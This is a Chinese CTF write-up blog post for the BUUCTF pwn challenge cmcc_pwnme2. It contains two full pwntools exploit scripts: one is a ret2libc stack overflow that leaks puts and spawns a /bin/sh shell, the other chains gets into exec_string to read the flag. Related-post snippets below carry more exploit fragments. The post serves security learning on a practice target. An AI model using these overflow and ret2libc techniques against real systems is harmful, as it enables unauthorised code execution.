cmcc_pwnme2

最新推荐文章于 2024-01-31 14:40:58 发布
最新推荐文章于 2024-01-31 14:40:58 发布
阅读量687 收藏 1
点赞数 2
分类专栏: buuctf 题目 文章标签: linux c语言 运维 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122225879
版权
这篇博客主要展示了如何利用栈溢出漏洞进行远程代码执行。通过ret2libc技术,构造payload,首先触发puts函数地址覆盖,然后执行system函数获取shell。此外,还提到了另一个利用gets函数执行exec_string的场景,输入特定字符串以执行flag相关操作。
摘要由CSDN通过智能技术生成

cmcc_pwnme2

查看保护
请添加图片描述
请添加图片描述
直接用的ret2libc。

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27722)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.sym['main']

p1 = b'a' * (0x6c + 4) + p32(puts_plt) + p32(main_addr) + p32(puts_got)
r.sendline(p1)

puts_addr = u32(r.recvuntil('\xf7')[-4:].ljust(4, b'\x00'))
success('puts_addr = ' + hex(puts_addr))

libc = ELF('libc-2.23.so')
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + libc.search(b'/bin/sh').__next__()

p2 = b'a' * (0x6c + 4) + p32(system_addr) +  p32(main_addr) + p32(bin_sh)
r.sendline(p2)


r.interactive()

看了一下其它函数,发现题意应该是借助这三个函数来拿flag。
请添加图片描述
请添加图片描述
这个函数会打开string这里的文件
请添加图片描述
请添加图片描述
这两个文件是个目录,借助栈溢出这个漏洞执行exec_string这个函数。string里填充add_home add_flag即可。但是buu的话本目录下就有flag。所以打buu远程的话string改成flag即可。

from pwn import *

context(arch='i386', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27722)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

gets_plt = elf.plt['gets']
exec_string = 0x80485CB

p1 = b'a' * (0x6c + 4) + p32(gets_plt) + p32(exec_string) + p32(0x804a060)
r.sendline(p1)
r.sendline('flag')

r.interactive()
z1r0.
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
cmcc pwnme2
pondzhang的专栏
12-25 307
from pwn import * #p = process('./pwnme2') p = remote("node3.buuoj.cn",26522) libc = ELF('./libc-2.23.so') plt_puts = 0x08048490 got_puts = 0x0804A028 main = 0x080486F8 payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) + p32(main) + p32(got_puts).
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
[BUUCTF]PWN——cmcc_pwnme2
mcmuyanga的博客
01-20 968
cmcc_pwnme2 附件 步骤: 例行检查,32位,开启了nx保护 本地运行一下看看大概的情况 32位ida载入 main(),10行的gets存在溢出 userfunction() main函数里就这么多东西,看看左边的函数列表,发现了挺有意思的几个函数 exec_string() add_home() add_flag() 由于exec_string()函数的存在,所以想到的是利用它来读取出flag,add_home()和add_flag()应该是这题比赛时候的目录,根据之前在buu
BUUCTF之“cmcc_pwnme2”做题简单记录
Probeginner的博客
12-11 2635
这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就 是提示的信息。 from pwn import * p = remote('node4.buuoj.cn',25488) elf=ELF('./pwnme2') exec_string=0x080485cb string=0x0804a060 gets=elf.sym['gets'] p.recvuntil('Please input:\n') payload=b'a'*(0x6c+4)+p32(gets)+p32(.
Amigo_CMCC_Anjian.rar_Amigo_CMCC_Anji_UltraEdit_飞信
09-21
飞信 无UltraEdit-32 UltraEdit-32
cmcc_simplerop
01-07
思路 明显rop可以用工具但是需要自己调一下长度emem exp: from pwn import * from struct import pack #io=process('./simplerop') ...io.recvuntil(':') # Padding goes here p = 'a'*0x14+p32(1)*3 ...
SCH-MSM8909_MAIN BOARD_CMCC_PVT_A
03-23
【标题】"SCH-MSM8909_MAIN BOARD_CMCC_PVT_A" 指的是一款基于高通骁龙MSM8909处理器的主板设计,主要用于中国移动通讯公司的定制产品。这个标题暗示了这是一个针对特定运营商的、经过私有化验证的主板设计方案。 ...
CMCC_cn_iPhone-15.5
05-20
移动运营商文件 CMCC_cn_iPhone-15.5
[BUUCTF]-PWN:cmcc_pwnme2解析
最新发布
2301_79326813的博客
01-31 250
保护ida。
pwnme2pwnme3的wp
一个码农的笔记
10-15 1405
这两个题目是cmcc的比赛,比较有意思,我把pwn的wp发出来,供大家学习,我会写的稍微详细一点,方便新手学习 pwnme2的下载地址是http://download.csdn.net/download/niexinming/10021147 题目要求:Task: 溢出,操控按顺序执行函数,读取到flag文件即可... 题目地址:nc 104.224.169.128 18887把pwnme2直接
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 489
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 473
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
buuctf pwn2_sctf_2016
qq_42728977的博客
03-21 626
pwn2_sctf_2016 degree of difficulty: 2 source of the challenges:buuctf/sctf_2016 solving ideas:Stack overslow,atoi-function’s negative number overslow Put it in IDA32,we can see this easy program. l...
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 412
buuctf pwn 第三页
buuctf-pwn write-ups (10)
CoLin的pwn小屋
03-04 590
buuctf wp
CTF--2016湖湘杯全国网络安全技能大赛之栈溢出pwnme
关注互联网安全的小虾米一枚
03-30 6534
0x01 基础知识 本题目考察逆向分析,漏洞挖掘以及利用能力。 学习本篇技术,提前储备好栈溢出相关知识。 关键技术点 scanf函数溢出漏洞 0x02 基本分析 拿到题目先对其进行基本分析,使用工具checksec.sh脚本检测。 根据这个判断程序运行在32位系统之上。没有开启canary和nx保护。 猜测题目考察内容多为溢出漏洞。运行程序
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 1915
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
buuctf DSACTF7月pwn 栈迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got
carol2358的博客
07-27 1600
文章目录actf_2019_babystack actf_2019_babystack 栈迁移,注意ret对齐 没对齐的: 对齐的: exp: from pwn import * from LibcSearcher import * local_file = './ACTF_2019_babystack' local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so' remote_libc = '/root/glibc-all-in-o
CMCC LTE外场测试指南:注意事项与操作详解
2. 自测阶段:这部分着重于用户自我检测和验证功能的环节,可能是针对终端的性能测试、功能完整性测试,或者是特定的软件更新和兼容性检查。自测阶段的重要性在于确保设备满足预期的性能标准,并及时发现并解决问题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值